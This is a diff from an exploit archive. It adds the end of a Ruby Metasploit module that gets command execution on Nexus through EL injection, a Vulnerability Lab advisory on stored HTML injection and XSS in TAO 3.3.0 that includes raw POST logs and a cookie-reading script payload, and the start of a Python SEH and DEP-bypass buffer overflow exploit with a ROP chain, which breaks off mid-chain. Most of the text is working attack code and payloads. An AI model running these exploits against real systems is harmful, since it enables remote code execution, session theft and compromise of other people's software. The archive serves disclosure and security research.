||||||
|
unless res
|
||||||
|
fail_with(Failure::Unknown, 'Target did not respond to payload request')
|
||||||
|
end
|
||||||
|
|
||||||
|
unless res.code == 400 && res.body.match(/java\.lang\.UNIXProcess@\h+/)
|
||||||
|
fail_with(Failure::PayloadFailed, "Could not execute command: #{cmd}")
|
||||||
|
end
|
||||||
|
|
||||||
|
print_good("Successfully executed command: #{cmd}")
|
||||||
|
end
|
||||||
|
|
||||||
|
# PoC based off API docs for /service/rest/beta/repositories/go/group:
|
||||||
|
# http://localhost:8081/#admin/system/api
|
||||||
|
def json_payload(cmd)
|
||||||
|
{
|
||||||
|
'name' => 'internal',
|
||||||
|
'online' => true,
|
||||||
|
'storage' => {
|
||||||
|
'blobStoreName' => 'default',
|
||||||
|
'strictContentTypeValidation' => true
|
||||||
|
},
|
||||||
|
'group' => {
|
||||||
|
# XXX: memberNames has to be an array, but the API example was a string
|
||||||
|
'memberNames' => [el_payload(cmd)]
|
||||||
|
}
|
||||||
|
}.to_json
|
||||||
|
end
|
||||||
|
|
||||||
|
# Helpful resource from which I borrowed the EL payload:
|
||||||
|
# https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf
|
||||||
|
def el_payload(cmd)
|
||||||
|
# HACK: Format our EL expression nicely and then strip introduced whitespace
|
||||||
|
el = <<~EOF.gsub(/\s+/, '')
|
||||||
|
${
|
||||||
|
"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke(
|
||||||
|
"".getClass().forName("java.lang.Runtime")
|
||||||
|
).exec("PATCH_ME")
|
||||||
|
}
|
||||||
|
EOF
|
||||||
|
|
||||||
|
# Patch in our command, escaping any double quotes
|
||||||
|
el.sub('PATCH_ME', cmd.gsub('"', '\\"'))
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
433
exploits/php/webapps/48341.txt
Normal file
433
exploits/php/webapps/48341.txt
Normal file
|
@ -0,0 +1,433 @@
|
||||||
|
# Title: TAO Open Source Assessment Platform 3.3.0 RC02 - HTML Injection
|
||||||
|
# Author: Vulnerability Laboratory
|
||||||
|
# Date: 2020-04-15
|
||||||
|
# Vendor: https://www.taotesting.com
|
||||||
|
# Software Link: https://www.taotesting.com/product/
|
||||||
|
# CVE: N/A
|
||||||
|
|
||||||
|
Document Title:
|
||||||
|
===============
|
||||||
|
TAO Open Source Assessment Platform v3.3.0 RC02 - Multiple Web
|
||||||
|
Vulnerabilities
|
||||||
|
|
||||||
|
|
||||||
|
References (Source):
|
||||||
|
====================
|
||||||
|
https://www.vulnerability-lab.com/get_content.php?id=2215
|
||||||
|
|
||||||
|
|
||||||
|
Release Date:
|
||||||
|
=============
|
||||||
|
2020-04-16
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Laboratory ID (VL-ID):
|
||||||
|
====================================
|
||||||
|
2215
|
||||||
|
|
||||||
|
|
||||||
|
Common Vulnerability Scoring System:
|
||||||
|
====================================
|
||||||
|
4
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Class:
|
||||||
|
====================
|
||||||
|
Multiple
|
||||||
|
|
||||||
|
|
||||||
|
Current Estimated Price:
|
||||||
|
========================
|
||||||
|
500€ - 1.000€
|
||||||
|
|
||||||
|
|
||||||
|
Product & Service Introduction:
|
||||||
|
===============================
|
||||||
|
Accelerating innovation in digital assessment. The TAO assessment
|
||||||
|
platform gives you the freedom, control, and
|
||||||
|
support to evolve with today's learners. For organizations who want the
|
||||||
|
freedom to control their assessment
|
||||||
|
software – from authoring to delivery to reporting.
|
||||||
|
|
||||||
|
(Copy of the Homepage: https://www.taotesting.com/product/ )
|
||||||
|
|
||||||
|
|
||||||
|
Abstract Advisory Information:
|
||||||
|
==============================
|
||||||
|
The vulnerability laboratory core research team discovered multiple
|
||||||
|
cross site vulnerabilities in the TAO Open Source Assessment Platform
|
||||||
|
v3.3.0 RC02.
|
||||||
|
|
||||||
|
|
||||||
|
Affected Product(s):
|
||||||
|
====================
|
||||||
|
Product: TAO Open Source Assessment Platform v3.3.0 RC02
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Disclosure Timeline:
|
||||||
|
==================================
|
||||||
|
2020-04-16: Public Disclosure (Vulnerability Laboratory)
|
||||||
|
|
||||||
|
|
||||||
|
Discovery Status:
|
||||||
|
=================
|
||||||
|
Published
|
||||||
|
|
||||||
|
|
||||||
|
Exploitation Technique:
|
||||||
|
=======================
|
||||||
|
Remote
|
||||||
|
|
||||||
|
|
||||||
|
Severity Level:
|
||||||
|
===============
|
||||||
|
Medium
|
||||||
|
|
||||||
|
|
||||||
|
Authentication Type:
|
||||||
|
====================
|
||||||
|
Restricted authentication (user/moderator) - User privileges
|
||||||
|
|
||||||
|
|
||||||
|
User Interaction:
|
||||||
|
=================
|
||||||
|
Low User Interaction
|
||||||
|
|
||||||
|
|
||||||
|
Disclosure Type:
|
||||||
|
================
|
||||||
|
Independent Security Research
|
||||||
|
|
||||||
|
|
||||||
|
Technical Details & Description:
|
||||||
|
================================
|
||||||
|
1.1
|
||||||
|
A html injection web vulnerability has been discovered in the TAO Open
|
||||||
|
Source Assessment Platform v3.3.0 RC02 web-application.
|
||||||
|
The vulnerability allows remote attackers to inject own malicious html
|
||||||
|
codes with persistent attack vector to compromise browser
|
||||||
|
to web-application requests from the application-side.
|
||||||
|
|
||||||
|
The html inject web vulnerability is located in the `userFirstName`,
|
||||||
|
`userLastName`, `userMail`, `password2`, and `password3`
|
||||||
|
parameters of the user account input field. The request method to inject
|
||||||
|
is POST and the attack vector is application-side.
|
||||||
|
Remote attackers are able to inject html code for the user account
|
||||||
|
credentials to provoke an execution within the main manage
|
||||||
|
user listing.
|
||||||
|
|
||||||
|
Successful exploitation of the web vulnerability results in persistent
|
||||||
|
phishing attacks, persistent external redirects to malicious
|
||||||
|
source and persistent manipulation of affected application modules.
|
||||||
|
|
||||||
|
Request Method(s):
|
||||||
|
[+] POST
|
||||||
|
|
||||||
|
Vulnerable Module(s):
|
||||||
|
[+] Manage Users
|
||||||
|
|
||||||
|
Vulnerable Parameter(s):
|
||||||
|
[+] userFirstName
|
||||||
|
[+] userLastName
|
||||||
|
[+] userMail
|
||||||
|
[+] password2
|
||||||
|
[+] password3
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
1.2
|
||||||
|
Multiple persistent cross site web vulnerabilities has been discovered
|
||||||
|
in the TAO Open Source Assessment Platform v3.3.0 RC02.
|
||||||
|
The vulnerability allows remote attackers to inject own malicious script
|
||||||
|
codes with persistent attack vector to compromise browser to
|
||||||
|
web-application requests from the application-side.
|
||||||
|
|
||||||
|
The persistent vulnerability is located in the content parameter of the
|
||||||
|
Rubric Block (Add) module. Attackers are able to inject own malicious
|
||||||
|
script code inside of the rubric name value. The attached values will be
|
||||||
|
redisplayed in the frontend of tao. The request method to inject is
|
||||||
|
POST and the attack vector is located on the application-side. The
|
||||||
|
injection point is the Rubric Block (Add) module and the execution occurs
|
||||||
|
in the frontend panel when listing the item attribute.
|
||||||
|
|
||||||
|
Successful exploitation of the web vulnerability results in session
|
||||||
|
hijacking, persistent phishing attacks, persistent external redirects
|
||||||
|
to malicious source and persistent manipulation of affected or connected
|
||||||
|
application modules.
|
||||||
|
|
||||||
|
Request Method(s):
|
||||||
|
[+] POST
|
||||||
|
|
||||||
|
Vulnerable Module(s):
|
||||||
|
[+] Rubric Block (Add)
|
||||||
|
|
||||||
|
Vulnerable Parameter(s):
|
||||||
|
[+] content
|
||||||
|
|
||||||
|
|
||||||
|
Proof of Concept (PoC):
|
||||||
|
=======================
|
||||||
|
1.1
|
||||||
|
The persistent html injection web vulnerability can be exploited by
|
||||||
|
remote attackers with privileged user account and low user interaction.
|
||||||
|
For security demonstration or to reproduce the security web
|
||||||
|
vulnerability follow the provided information and steps below to continue.
|
||||||
|
|
||||||
|
|
||||||
|
Manual steps to reproduce the vulnerability ...
|
||||||
|
1. Install the application and open the ui
|
||||||
|
2. Move on top right to the user button and click manage users
|
||||||
|
3. Inject html script code payload into the vulnerable input fields
|
||||||
|
4. Save the entry
|
||||||
|
5. Open to the manage users listing
|
||||||
|
Note: The payloads executes in the table that shows the user account
|
||||||
|
values for admins
|
||||||
|
6. Successful reproduce of the html inject vulnerability!
|
||||||
|
|
||||||
|
|
||||||
|
PoC: Vulnerable Source (Manage Users)
|
||||||
|
<th class="actions">Actions</th>
|
||||||
|
</tr></thead>
|
||||||
|
<tbody>
|
||||||
|
<tr data-item-identifier="http_2_localhost_1_tao_0_rdf_3_i1586957152301539">
|
||||||
|
<td class="login"><img
|
||||||
|
src="https://www.evolution-sec.com/evosec-logo.png"></td>
|
||||||
|
<td class="firstname"><img
|
||||||
|
src="https://www.evolution-sec.com/evosec-logo.png"></td>
|
||||||
|
<td class="lastname"><img
|
||||||
|
src="https://www.evolution-sec.com/evosec-logo.png"></td>
|
||||||
|
<td class="email"><img
|
||||||
|
src="https://www.evolution-sec.com/evosec-logo.png"></td>
|
||||||
|
<td class="roles">Test Taker</td>
|
||||||
|
<td class="guiLg">German</td>
|
||||||
|
<td class="status"><span class="icon-result-ok"></span> enabled</td>
|
||||||
|
|
||||||
|
|
||||||
|
--- PoC Session Logs (POST) ---
|
||||||
|
http://localhost:89/tao/Users/edit
|
||||||
|
Host: localhost:89
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0)
|
||||||
|
Gecko/20100101 Firefox/74.0
|
||||||
|
Accept: text/html, */*; q=0.01
|
||||||
|
Accept-Language: de,en-US;q=0.7,en;q=0.3
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
X-Requested-With: XMLHttpRequest
|
||||||
|
Content-Length: 1393
|
||||||
|
Origin: http://localhost:89
|
||||||
|
Connection: keep-alive
|
||||||
|
Referer:
|
||||||
|
http://localhost:89/tao/Main/index?structure=users&ext=tao§ion=edit_user
|
||||||
|
Cookie: tao_GP8CPowQ=d6et7oifjip9jnkbc7pgeotsdj;
|
||||||
|
tao_0855799=e0a3289004cc96a4ffba7bdcb8515d3665ccd004
|
||||||
|
user_form_sent=1&tao.forms.instance=1&token=e0a3289004cc96a4ffba7bdcb8515d3665ccd004&http_2_www_0_w3_0_org_1_2000_1_01_1_
|
||||||
|
rdf-schema_3_label=<img
|
||||||
|
src="https://www.evolution-sec.com/evosec-logo.png">&id=http://localhost/tao.rdf#i1586957152301539
|
||||||
|
&http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userFirstName=<img
|
||||||
|
src="https://www.evolution-sec.com/evosec-logo.png">
|
||||||
|
&http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userLastName=<img
|
||||||
|
src="https://www.evolution-sec.com/evosec-logo.png">
|
||||||
|
&http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userMail=<img
|
||||||
|
src="https://www.evolution-sec.com/evosec-logo.png">&http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userUILg=http_2_www_0_tao_0_lu_1_Ontologies_1_TAO_0_rdf_3_Langca&
|
||||||
|
http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userRoles_9=http_2_www_0_tao_0_lu_1_Ontologies_1_TAO_0_rdf_3_DeliveryRole&
|
||||||
|
classUri=http_2_www_0_tao_0_lu_1_Ontologies_1_TAOSubject_0_rdf_3_Subject&uri=http_2_localhost_1_tao_0_rdf_3_i1586957152301539
|
||||||
|
&password2=<img src="https://www.evolution-sec.com/evosec-logo.png">
|
||||||
|
&password3=<img src="https://www.evolution-sec.com/evosec-logo.png">
|
||||||
|
-
|
||||||
|
POST: HTTP/1.1 200 OK
|
||||||
|
Server: Apache/2.4.38 (Win32) PHP/7.2.15
|
||||||
|
X-Powered-By: PHP/7.2.15
|
||||||
|
Set-Cookie: tao_0855799=a4dd4f04e0f27648dcd6ee3e966cdb380d511079; path=/
|
||||||
|
Keep-Alive: timeout=5, max=100
|
||||||
|
Connection: Keep-Alive
|
||||||
|
Transfer-Encoding: chunked
|
||||||
|
Content-Type: text/html; charset=UTF-8
|
||||||
|
|
||||||
|
|
||||||
|
Reference(s):
|
||||||
|
http://localhost:89/tao/Users/edit
|
||||||
|
http://localhost:89/tao/Main/index
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
1.2
|
||||||
|
The persistent cross site scripting web vulnerability can be exploited
|
||||||
|
by remote attackers with privileged user account with low user interaction.
|
||||||
|
For security demonstration or to reproduce the cross site scripting web
|
||||||
|
vulnerability follow the provided information and steps below to continue.
|
||||||
|
|
||||||
|
|
||||||
|
Manual steps to reproduce the vulnerability ...
|
||||||
|
1. Open and login to the tao application
|
||||||
|
2. Move into the test module on top
|
||||||
|
3. Add new Rubric Block
|
||||||
|
4. Inject script code test payload into the text label content input field
|
||||||
|
5. Save the entry and move on the right site to activate
|
||||||
|
6. The click on activate includes and executes the content immediatly
|
||||||
|
7. Succesful reproduce of the cross site scripting vulnerability!
|
||||||
|
|
||||||
|
|
||||||
|
PoC: Vulnerable Source
|
||||||
|
<div class="rubricblock-content"><div>asd>"><span
|
||||||
|
data-serial="img_l9lmylhuv8hf55xo9z264n"
|
||||||
|
class="widget-box widget-inline widget-img" data-qti-class="img"
|
||||||
|
contenteditable="false">
|
||||||
|
<img data-serial="img_l9lmylhuv8hf55xo9z264n" data-qti-class="img"
|
||||||
|
src="" alt="" style=""
|
||||||
|
width="100%"></span> <img data-serial="img_rxephz0lwthtejgsndo2f3"
|
||||||
|
data-qti-class="img" src="evil.source" alt="" style="">
|
||||||
|
>"<script>alert(document.cookie)></script></div></iframe></div></div>
|
||||||
|
</li></ol>
|
||||||
|
|
||||||
|
|
||||||
|
PoC: Payload
|
||||||
|
"<script>alert(document.cookie)></script>
|
||||||
|
|
||||||
|
|
||||||
|
--- PoC Session Logs [POST] ---
|
||||||
|
http://localhost:89/taoQtiTest/Creator/saveTest?uri=http%3A%2F%2Flocalhost%2Ftao.rdf%23i1586971961942612
|
||||||
|
Host: localhost:89
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
|
||||||
|
Gecko/20100101 Firefox/75.0
|
||||||
|
Accept: application/json, text/javascript, */*; q=0.01
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
X-Requested-With: XMLHttpRequest
|
||||||
|
Content-Length: 9664
|
||||||
|
Origin: http://localhost:89
|
||||||
|
Connection: keep-alive
|
||||||
|
Referer:
|
||||||
|
http://localhost:89/tao/Main/index?structure=tests&ext=taoTests§ion=authoring
|
||||||
|
Cookie: tao_X3GLb7Ke=i89lfik72ts13i8soadgfb64hb;
|
||||||
|
tao_f46245c=9ebdee0d0f34b349a61ba23443ecc950c43a0042
|
||||||
|
model={"qti-type":"assessmentTest","identifier":"Test-1","title":"QTI
|
||||||
|
Example Test","toolName":"tao","toolVersion":"2.7","outcomeDeclarations":[],
|
||||||
|
"timeLimits":{"qti-type":"timeLimits","maxTime":7810,"allowLateSubmission":false},"testParts":[{"qti-type":"testPart","identifier":"Introduction","navigationMode":1,"submissionMode":0,"preConditions":[],"branchRules":[],
|
||||||
|
"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":0,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":false,
|
||||||
|
"validateResponses":false,"allowSkipping":true},"assessmentSections":[{"qti-type":"assessmentSection","title":"Section
|
||||||
|
1","visible":true,
|
||||||
|
"keepTogether":true,"sectionParts":[{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971963337314","categories":[],
|
||||||
|
"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-1","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0,
|
||||||
|
"itemSessionControl"{"qtitype":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":true,
|
||||||
|
"validateResponses":false,"allowSkipping":true},"isLinear":false}],"identifier":"assessmentSection-1","required":true,"fixed":false,"preConditions":[],"branchRules":[],
|
||||||
|
"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":true,"validateResponses":
|
||||||
|
false,"allowSkipping":true},"index":0}],"testFeedbacks":[],"index":0},{"qti-type":"testPart","identifier":"QTIExamples","navigationMode":0,"submissionMode":0,"preConditions":[],"branchRules":[],"assessmentSections":[{"qti-type":"assessmentSection","title":"Section
|
||||||
|
1","visible":false,"keepTogether":true,"sectionParts":[{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971964187315","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-2","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0,"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowComment":false,"allowSkipping":true,"validateResponses":false},"isLinear":true,
|
||||||
|
"timeLimits":{"maxTime":0,"minTime":0,"allowLateSubmission":false,"qti-type":"timeLimits"}},{"qti-type":"assessmentItemRef",
|
||||||
|
"href":"http://localhost/tao.rdf#i1586971965925016","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-3","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":1,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},
|
||||||
|
{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i158697196662817","categories":[],"variableMappings":[],"weights":[],
|
||||||
|
"templateDefaults":[],"identifier":"item-4","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":2,"itemSessionControl
|
||||||
|
":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971967539318","categories"
|
||||||
|
:[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-5","required":false,"fixed":false,"preConditions":[],"branchRules":[],
|
||||||
|
"index":3,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":
|
||||||
|
"http://localhost/tao.rdf#i1586971968508019","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-6",
|
||||||
|
"required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":4,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971969922220","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":
|
||||||
|
"item-7","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":5,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i158697197087021","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-8","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":6,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971970668622","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":
|
||||||
|
"item-9","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":7,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true}],"identifier":"assessmentSection-2","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0,
|
||||||
|
"itemSessionControl":{"qti-type":"itemSessionControl"},"rubricBlocks":[{"qti-type":"rubricBlock","index":0,"content":[{"qti-type":"div","id":"","class":"","xmlBase":"","lang":"","label":"","content":[{"qti-type":"textRun","content":"asd>"<script>alert(document.cookie)></script>",
|
||||||
|
"xmlBase":""}]}],"views":["candidate"],"orderIndex":1,"uid":"rb1","feedback":{"activated":false,"outcome":null,"matchValue":null,"qti-type":"feedback"},
|
||||||
|
"class":""}]}],"testFeedbacks":[],"index":1}],"testFeedbacks":[],"scoring":{"modes":{"none":{"key":"none","label":"None","description":"No
|
||||||
|
outcome processing.
|
||||||
|
Erase the existing rules, if
|
||||||
|
any.","qti-type":"none"},"custom":{"key":"custom","label":"Custom","description":"bufu","qti-type":"cut"},"qti-type":"modes"},"scoreIdentifier":"SCORE","weightIdentifier":"","cutScore":0.5,"categoryScore":false,"outcomeProcessing":"none","qti-type":"scoring"}}
|
||||||
|
-
|
||||||
|
POST: HTTP/1.1 200 OK
|
||||||
|
Server: Apache/2.4.38 (Win32) PHP/7.2.15
|
||||||
|
X-Powered-By: PHP/7.2.15
|
||||||
|
Cache-Control: no-store, no-cache, must-revalidate
|
||||||
|
Pragma: no-cache
|
||||||
|
Content-Security-Policy: frame-ancestors 'self'
|
||||||
|
Content-Length: 14
|
||||||
|
Keep-Alive: timeout=5, max=100
|
||||||
|
Connection: Keep-Alive
|
||||||
|
Content-Type: application/json; charset=UTF-8
|
||||||
|
-
|
||||||
|
http://localhost:89/tao/Main/evil.source
|
||||||
|
Host: localhost:89
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
|
||||||
|
Gecko/20100101 Firefox/75.0
|
||||||
|
Accept: image/webp,*/*
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Connection: keep-alive
|
||||||
|
Referer:
|
||||||
|
http://localhost:89/tao/Main/index?structure=tests&ext=taoTests§ion=authoring
|
||||||
|
Cookie: tao_X3GLb7Ke=i89lfik72ts13i8soadgfb64hb;
|
||||||
|
tao_f46245c=9ebdee0d0f34b349a61ba23443ecc950c43a0042
|
||||||
|
-
|
||||||
|
GET: HTTP/1.1 200 OK
|
||||||
|
Server: Apache/2.4.38 (Win32) PHP/7.2.15
|
||||||
|
X-Powered-By: PHP/7.2.15
|
||||||
|
Cache-Control: no-store, no-cache, must-revalidate
|
||||||
|
Pragma: no-cache
|
||||||
|
Content-Length: 169
|
||||||
|
Keep-Alive: timeout=5, max=99
|
||||||
|
Connection: Keep-Alive
|
||||||
|
Content-Type: text/html; charset=UTF-8
|
||||||
|
|
||||||
|
|
||||||
|
Security Risk:
|
||||||
|
==============
|
||||||
|
1.1
|
||||||
|
The security risk of the html inject web vulnerability in the
|
||||||
|
web-application is estimated as medium.
|
||||||
|
|
||||||
|
1.2
|
||||||
|
The security risk of the persistent cross site scripting web
|
||||||
|
vulnerability in the web-application is estimated as medium.
|
||||||
|
|
||||||
|
|
||||||
|
Credits & Authors:
|
||||||
|
==================
|
||||||
|
Vulnerability-Lab -
|
||||||
|
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
|
||||||
|
Benjamin Kunz Mejri -
|
||||||
|
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
|
||||||
|
|
||||||
|
|
||||||
|
Disclaimer & Information:
|
||||||
|
=========================
|
||||||
|
The information provided in this advisory is provided as it is without
|
||||||
|
any warranty. Vulnerability Lab disclaims all warranties,
|
||||||
|
either expressed or implied, including the warranties of merchantability
|
||||||
|
and capability for a particular purpose. Vulnerability-Lab
|
||||||
|
or its suppliers are not liable in any case of damage, including direct,
|
||||||
|
indirect, incidental, consequential loss of business profits
|
||||||
|
or special damages, even if Vulnerability-Lab or its suppliers have been
|
||||||
|
advised of the possibility of such damages. Some states do
|
||||||
|
not allow the exclusion or limitation of liability for consequential or
|
||||||
|
incidental damages so the foregoing limitation may not apply.
|
||||||
|
We do not approve or encourage anybody to break any licenses, policies,
|
||||||
|
deface websites, hack into databases or trade with stolen data.
|
||||||
|
|
||||||
|
Domains: www.vulnerability-lab.com www.vuln-lab.com
|
||||||
|
www.vulnerability-db.com
|
||||||
|
Services: magazine.vulnerability-lab.com
|
||||||
|
paste.vulnerability-db.com infosec.vulnerability-db.com
|
||||||
|
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
|
||||||
|
youtube.com/user/vulnerability0lab
|
||||||
|
Feeds: vulnerability-lab.com/rss/rss.php
|
||||||
|
vulnerability-lab.com/rss/rss_upcoming.php
|
||||||
|
vulnerability-lab.com/rss/rss_news.php
|
||||||
|
Programs: vulnerability-lab.com/submit.php
|
||||||
|
vulnerability-lab.com/register.php
|
||||||
|
vulnerability-lab.com/list-of-bug-bounty-programs.php
|
||||||
|
|
||||||
|
Any modified copy or reproduction, including partially usages, of this
|
||||||
|
file requires authorization from Vulnerability Laboratory.
|
||||||
|
Permission to electronically redistribute this alert in its unmodified
|
||||||
|
form is granted. All other rights, including the use of other
|
||||||
|
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
|
||||||
|
All pictures, texts, advisories, source code, videos and other
|
||||||
|
information on this website is trademark of vulnerability-lab team & the
|
||||||
|
specific authors or managers. To record, list, modify, use or
|
||||||
|
edit our material contact (admin@ or research@) to get a ask permission.
|
||||||
|
|
||||||
|
Copyright © 2020 | Vulnerability Laboratory - [Evolution
|
||||||
|
Security GmbH]™
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
--
|
||||||
|
VULNERABILITY LABORATORY - RESEARCH TEAM
|
150
exploits/windows/local/48339.py
Executable file
150
exploits/windows/local/48339.py
Executable file
|
@ -0,0 +1,150 @@
|
||||||
|
# Exploit Title: Easy MPEG to DVD Burner 1.7.11 - Buffer Overflow (SEH + DEP)
|
||||||
|
# Date: 2020-04-15
|
||||||
|
# Exploit Author: Bailey Belisario
|
||||||
|
# Tested On: Windows 7 Ultimate x64
|
||||||
|
# Software Link: https://www.exploit-db.com/apps/32dc10d6e60ceb4d6e57052b6de3a0ba-easy_mpeg_to_dvd.exe
|
||||||
|
# Version: 1.7.11
|
||||||
|
# Exploit Length: 1015 Bytes
|
||||||
|
# Steps : Open application > Register > In Username field paste content of pwn.txt file (Note open this in sublime or vscode)
|
||||||
|
|
||||||
|
# Easy MPEG to DVD Burner 1.7.11 SEH + DEP Bypass using VirtualProtect() on Local Buffer Overflow
|
||||||
|
# Exploit used with Python2.7
|
||||||
|
#------------------------------------------------------------------------------------------------------------------------------------#
|
||||||
|
# Bad Characters: \x00\x0a\x0d #
|
||||||
|
# SEH Offset: 1012 #
|
||||||
|
# Modules Used: SkinMagic.dll & Easy MPEG to DVD Burner.exe #
|
||||||
|
#------------------------------------------------------------------------------------------------------------------------------------#
|
||||||
|
|
||||||
|
# Register setup for VirtualProtect() (Bypass DEP) :
|
||||||
|
#---------------------------------------------------
|
||||||
|
# EAX = Points to PUSHAD at time VirtualProtect() is called
|
||||||
|
# ECX = lpflOldProtect (0x10047d30 as writable location)
|
||||||
|
# EDX = flNewProtect(0x40)
|
||||||
|
# EBX = dwSize (0x92)
|
||||||
|
# ESP = lpAddress (automatic)
|
||||||
|
# EBP = ReturnTo (ptr to jmp esp)
|
||||||
|
# ESI = ptr to VirtualProtect()
|
||||||
|
# EDI = ROP NOP (RETN)
|
||||||
|
|
||||||
|
import struct
|
||||||
|
|
||||||
|
def create_rop_chain():
|
||||||
|
|
||||||
|
rop_gadgets = [
|
||||||
|
|
||||||
|
# Put 1 in EDX and decrement to 0
|
||||||
|
0x10031752, # XOR EDX,EDX # CMP EAX,DWORD PTR [ECX+8] # SETGE DL # MOV AL,DL # RETN
|
||||||
|
0x1003629a, # ADD EAX,4 # DEC EDX # JNE SKINMAGIC!SETSKINMENU+0X2F505 (10036295) # POP ESI # RETN
|
||||||
|
0x11111111, # Filler
|
||||||
|
|
||||||
|
# Pop the pointer of VirtualProtect into EAX
|
||||||
|
0x10037b12, # POP EAX # RETN
|
||||||
|
0x1003b268, # ptr to &VirtualProtect() [IAT SkinMagic.dll]
|
||||||
|
|
||||||
|
# Dereference Pointer into EDX then move back to EAX
|
||||||
|
0x1001c011, # ADD EDX,DWORD PTR [EAX] # RETN 0x0C
|
||||||
|
0x10031772, # MOV EAX,EDX # RETN
|
||||||
|
0x11111111, # Filler
|
||||||
|
0x11111111, # Filler
|
||||||
|
0x11111111, # Filler
|
||||||
|
|
||||||
|
# Push VP and pop into EBP
|
||||||
|
0x1002e17b, # PUSH EAX # PUSH ESP # XOR EAX,EAX # POP ESI # POP EBP # RETN 0x0C
|
||||||
|
0x10037b12, # POP EAX # RETN
|
||||||
|
0x11111111, # Filler
|
||||||
|
0x11111111, # Filler
|
||||||
|
0x11111111, # Filler
|
||||||
|
|
||||||
|
# Use this to get to address needed to Pop VP into ESI
|
||||||
|
0x1003619e, # POP EAX # POP ESI # RETN
|
||||||
|
|
||||||
|
# Move VP to +12 on stack then push the POP POP RETN
|
||||||
|
0x10032485, # MOV DWORD PTR [ESP+0CH],EBP # LEA EBP,DWORD PTR DS:[ESP+0CH] # PUSH EAX # RETN
|
||||||
|
0x11111111, # Filler popped
|
||||||
|
0x11111111, # Filler popped
|
||||||
|
|
||||||
|
# Set ESI to VP
|
||||||
|
0x1002e1ce, # POP ESI # RETN [SkinMagic.dll]
|
||||||
|
0x11111111, # Where VP is MOV into
|
||||||
|
|
||||||
|
# Set EBP with POP EBP RETN
|
||||||
|
0x1002894f, # POP EBP # RETN [SkinMagic.dll]
|
||||||
|
0x1002894f, # skip 4 bytes [SkinMagic.dll]
|
||||||
|
|
||||||
|
# Set EDX (# s -d 0x10000000 L?0x10050000 0000003f <- used to find 3F)
|
||||||
|
# Clear out EDX, set it to 0x01, find address where DWORD of EAX will be 0x3F, then add to EDX to be 0x40
|
||||||
|
0x10031752, # XOR EDX,EDX # CMP EAX,DWORD PTR [ECX+8] # SETGE DL # MOV AL,DL # RETN
|
||||||
|
0x10037b12, # POP EAX # RETN
|
||||||
|
0x1005a0a0, # Address of 3F
|
||||||
|
0x10026173, # ADD EDX,DWORD PTR [EAX] # RETN
|
||||||
|
